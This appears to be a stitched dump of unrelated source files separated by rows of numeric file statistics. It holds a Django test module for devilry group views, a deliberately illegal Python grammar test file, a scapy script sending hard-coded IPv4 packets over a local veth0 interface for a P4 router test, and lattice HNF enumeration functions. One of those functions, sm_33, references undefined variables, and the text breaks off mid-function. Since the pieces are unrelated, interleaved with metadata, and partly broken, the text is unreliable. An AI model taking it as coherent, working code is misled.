selector = htmls.S(groupdetails.GroupDetailsRenderable(value=testgroup,
assignment=testgroup.assignment).render())
self.assertFalse(selector.exists('.devilry-cradmin-groupitemvalue-grade'))
def test_grade_comment_summary_is_available(self):
AssignmentGroupDbCacheCustomSql().initialize()
mommy.make('core.AssignmentGroup')
testgroup = AssignmentGroup.objects.first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(value=testgroup,
assignment=testgroup.assignment).render())
self.assertTrue(selector.exists('.devilry-cradmin-groupitemvalue-comments'))
self.assertEqual(
'0 comments from student. 0 files from student. 0 comments from examiner.',
selector.one('.devilry-cradmin-groupitemvalue-comments').alltext_normalized)
class TestGroupDetailsView(test.TestCase, cradmin_testhelpers.TestCaseMixin):
viewclass = groupdetails.GroupDetailsView
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def __mockinstance_with_devilryrole(self, devilryrole):
mockinstance = mock.MagicMock()
mockinstance.get_devilryrole_for_requestuser.return_value = devilryrole
return mockinstance
def test_title(self):
testgroup = mommy.make('core.AssignmentGroup')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='Test User')
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
self.assertIn(
'Test User',
mockresponse.selector.one('title').alltext_normalized)
def test_h1(self):
testgroup = mommy.make('core.AssignmentGroup')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='Test User')
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
self.assertEqual(
'Test User',
mockresponse.selector.one('h1').alltext_normalized)
def test_links(self):
testgroup = mommy.make('core.AssignmentGroup')
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
self.assertEqual(2, len(mockresponse.request.cradmin_instance.reverse_url.call_args_list))
self.assertEqual(
mock.call(appname='studentoverview', args=(), viewname='INDEX', kwargs={}),
mockresponse.request.cradmin_instance.reverse_url.call_args_list[0]
)
self.assertEqual(
mock.call(appname='split_group', args=(), viewname='INDEX', kwargs={'pk': testgroup.id}),
mockresponse.request.cradmin_instance.reverse_url.call_args_list[1]
)
def test_title_multiple_candidates(self):
testgroup = mommy.make('core.AssignmentGroup')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='UserB')
devilry_core_mommy_factories.candidate(group=testgroup,
shortname='usera')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='UserC')
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
self.assertIn(
'usera, UserB, UserC',
mockresponse.selector.one('title').alltext_normalized)
def test_h1_multiple_candidates(self):
testgroup = mommy.make('core.AssignmentGroup')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='UserB')
devilry_core_mommy_factories.candidate(group=testgroup,
shortname='usera')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='UserC')
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
self.assertEqual(
'usera, UserB, UserC',
mockresponse.selector.one('h1').alltext_normalized)
def test_404_fully_anonymous_subjectadmin(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
with self.assertRaises(Http404):
self.mock_getrequest(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
def test_not_404_fully_anonymous_departmentadmin(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
self.mock_getrequest(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('departmentadmin'),
viewkwargs={'pk': testgroup.id})
| 52.955556
| 108
| 0.672052
| 1,293
| 14,298
| 7.150039
| 0.123743
| 0.06782
| 0.028123
| 0.042401
| 0.848567
| 0.828664
| 0.802704
| 0.802704
| 0.780206
| 0.720498
| 0
| 0.004146
| 0.240943
| 14,298
| 269
| 109
| 53.152416
| 0.847692
| 0
| 0
| 0.733333
| 0
| 0
| 0.135683
| 0.066443
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.095833
| false
| 0.008333
| 0.054167
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3c72e29ca9f6363ac823429e84a5535d2ac7a078
| 33
|
py
|
Python
|
Python/Tests/TestData/Grammar/FuncDefV3Illegal.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Grammar/FuncDefV3Illegal.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Grammar/FuncDefV3Illegal.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
def f(*): pass
def f(*, ): pass
| 16.5
| 16
| 0.484848
| 7
| 33
| 2.428571
| 0.571429
| 0.470588
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212121
| 33
| 2
| 17
| 16.5
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 1
| 0
| null | null | 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b1d0245d2ff57a9017be4eb87097b0232c5a3ff7
| 15,075
|
py
|
Python
|
p4v1_1/simple_router/send3.py
|
vibhaa/iw15
|
c2a316499dbd3e7459aed2cacf0612df0b7dcec2
|
[
"Apache-2.0"
] | 14
|
2019-02-25T22:42:15.000Z
|
2021-12-22T06:29:20.000Z
|
p4v1_1/simple_router/send3.py
|
vibhaa/iw15
|
c2a316499dbd3e7459aed2cacf0612df0b7dcec2
|
[
"Apache-2.0"
] | null | null | null |
p4v1_1/simple_router/send3.py
|
vibhaa/iw15
|
c2a316499dbd3e7459aed2cacf0612df0b7dcec2
|
[
"Apache-2.0"
] | 8
|
2018-11-25T11:42:24.000Z
|
2021-03-11T07:23:21.000Z
|
#!/usr/bin/python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from scapy.all import sniff, sendp
from scapy.all import Packet
from scapy.all import ShortField, IntField, LongField, BitField
from scapy.all import Ether, IP, TCP
import networkx as nx
import sys
def main():
if len(sys.argv) != 1:
print "Usage: send3.py"
sys.exit(1)
srcmac = '00:aa:bb:00:00:00'
dstmac = '00:aa:bb:00:00:01'
port = 80
msg = 'hi'
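    # Each block below builds an Ethernet/IPv4 frame with the fixed MACs
    # above and a hard-coded source/destination address pair, then sends it
    # out the veth0 interface via scapy's sendp() with verbose output off.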
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '100.164.100.128', dst = '43.43.40.133') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '100.164.100.128', dst = '43.43.40.133') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.123.163', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '178.31.22.70', dst = '107.28.107.71') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '144.187.28.60', dst = '1.66.27.105') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '178.31.22.70', dst = '107.28.107.71') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '108.33.126.83', dst = '1.96.222.205') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '221.240.197.5', dst = '5.252.32.90') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.90.2.206', dst = '1.96.223.244') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '166.139.87.73', dst = '65.50.22.225') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.101.151', dst = '1.103.139.4') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '10.72.121.3', dst = '1.102.49.27') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.181', dst = '1.64.216.94') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '88.152.119.231', dst = '111.205.228.206') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.61.56.89', dst = '1.96.223.155') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '107.170.178.200', dst = '43.147.200.81') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '96.111.103.68', dst = '1.107.73.178') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.181', dst = '1.64.216.94') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.138.120.88', dst = '1.96.166.250') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '123.236.179.105', dst = '3.237.87.51') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.119.217.194', dst = '1.96.222.230') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.119.217.194', dst = '1.96.222.230') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.110.10.118', dst = '1.96.166.240') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '119.238.4.231', dst = '1.96.167.6') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '120.178.72.26', dst = '1.96.167.113') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.45.41.147', dst = '1.96.166.164') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.46.167', dst = '1.47.68.166') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.98', dst = '1.47.38.193') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.46.167', dst = '1.47.68.166') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.139.68', dst = '1.96.166.250') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.46.167', dst = '1.47.68.166') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.84.70.126', dst = '1.100.159.220') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.101.136', dst = '43.237.96.251') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '194.253.242.112', dst = '153.193.46.216') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '119.250.18.65', dst = '1.96.167.9') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.236.126', dst = '1.96.166.250') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '131.57.76.156', dst = '153.193.46.95') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.98.136', dst = '5.240.144.4') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '106.84.38.210', dst = '1.2.210.83') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.46.167', dst = '1.47.68.166') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '199.76.207.73', dst = '5.252.32.94') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.45.41.147', dst = '1.96.166.164') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '70.142.123.53', dst = '210.108.49.173') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '120.186.203.249', dst = '1.96.166.204') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.201.127', dst = '1.96.223.181') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '167.197.111.177', dst = '1.108.198.61') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '117.94.42.4', dst = '3.249.221.65') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.98', dst = '1.47.38.193') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '152.124.151.163', dst = '5.252.121.56') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '5.62.244.96', dst = '210.108.49.161') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.84.66.210', dst = '1.37.115.176') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.45.41.147', dst = '1.96.166.164') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '117.82.4.57', dst = '1.153.193.158') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.98', dst = '1.47.38.193') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.98', dst = '1.47.38.193') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.45.106.71', dst = '1.96.223.171') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '208.39.232.165', dst = '66.216.25.163') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '130.19.222.95', dst = '43.239.34.29') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '119.238.4.231', dst = '1.96.167.6') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '106.105.195.57', dst = '1.124.228.13') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.62.172.236', dst = '57.35.22.70') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.45.108.137', dst = '1.96.222.237') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '65.125.163.1', dst = '5.252.100.69') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '39.148.52.166', dst = '210.108.26.25') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '39.148.52.166', dst = '210.108.26.25') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '199.50.151.24', dst = '3.239.255.71') / msg
sendp(p, iface = "veth0", verbose = 0)
if __name__ == '__main__':
main()
| 66.409692
| 110
| 0.596949
| 2,581
| 15,075
| 3.483534
| 0.10926
| 0.062062
| 0.093093
| 0.155155
| 0.831165
| 0.82894
| 0.82894
| 0.82894
| 0.825715
| 0.825715
| 0
| 0.207217
| 0.192968
| 15,075
| 226
| 111
| 66.70354
| 0.53181
| 0.038939
| 0
| 0.707921
| 0
| 0
| 0.201948
| 0
| 0
| 0
| 0.038552
| 0
| 0
| 0
| null | null | 0
| 0.029703
| null | null | 0.004951
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b1f6a8338e8ac7ff8ff95ca454b0f00d64351931
| 7,227
|
py
|
Python
|
spHNF_manip/sm.py
|
JohnEdChristensen/NiggliOptimize
|
e90b8c66e7b7e560c460502ee24991af775c625b
|
[
"MIT"
] | null | null | null |
spHNF_manip/sm.py
|
JohnEdChristensen/NiggliOptimize
|
e90b8c66e7b7e560c460502ee24991af775c625b
|
[
"MIT"
] | null | null | null |
spHNF_manip/sm.py
|
JohnEdChristensen/NiggliOptimize
|
e90b8c66e7b7e560c460502ee24991af775c625b
|
[
"MIT"
] | null | null | null |
def sm_33(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {-0.5, -2.0, -2.0};
a2 = {0.0, -2.0, 0.0};
a3 = {2.0, 0.0, 0.0};
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
        if (2*c)%a == 0:
            # NOTE: b, d, and e were never assigned in the original sm_33;
            # defaulting them to 0 is an assumption that yields a
            # well-formed HNF instead of a NameError at runtime.
            b = d = e = 0
            HNF = [[a,0,0],[b,c,0],[d,e,f]]
            srHNFs.append(HNF)
return srHNFs
def sm_33_old(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
[[2,0,0],[0,2,0],[0.5,0,2]].
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#beta1 condition
if c%2==0:
bs = [0,c/2]
else:
bs = [0]
#gamma2 condition
if f%2==0:
es = [0,f/2]
else:
es = [0]
for b in bs:
for e in es:
#gamma1 condition and gamma1 condition
gamma12 = 2*b*e/float(c)
if gamma12%f==0:
for d in range(f):
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_35(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {-0.668912,1.96676,-1.29785};
a2 = {-2.286942,2.584794,-0.29785};
a3 = {-1.0,-1.0,-1.0};
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#beta12 condition
if c%2==0:
bs = [0,c/2]
else:
bs = [0]
#gamma22 condition
if f%2==0:
es = [0,f/2]
else:
es = [0]
for e in es:
for b in bs:
g12 = (2 * b * e) / float(c)
if g12%f == 0:
for d in range(f):
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_35_2(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {-0.668912,1.96676,-1.29785};
a2 = {1.61803,-0.618034,-1.0};
a3 = {1.0,1.0,1.0};
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#gamme12 and gamma22
if f%2==0:
ds = [0,f/2]
es = [0,f/2]
else:
ds = [0]
es = [0]
for e in es:
for d in ds:
for b in range(c):
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_35_3(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {0.331088,2.96676,-0.29785};
a2 = {1.61803,-0.618034,-1.0};
a3 = {-1.0,-1.0,-1.0};
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#beta12 condition
if f%2==0:
es = [0,f/2]
else:
es = [0]
for e in es:
for d in range(f):
g11 = -2 * a + 2 * d
if g11%f == 0:
for b in range(c):
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_35_4(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {0.331088,2.96676,-0.29785};
a2 = {1.61803,-0.618034,-1.0};
a3 = {0.668912,-1.96676,1.29785};
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#beta12 condition
if c%2==0:
bs = [0,c/2]
else:
bs = [0]
for b in bs:
for d in range(f):
for e in range(f):
g11 = -2 * a + 2 * d - (2 * b * e / c)
if g11%f == 0:
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_35_5(n):
"""
Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {1,1,1}
a2 = {1.61803,-0.618034,-1}
a3 = {-0.668912,1.96676,-1.29785}
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#alpha 3
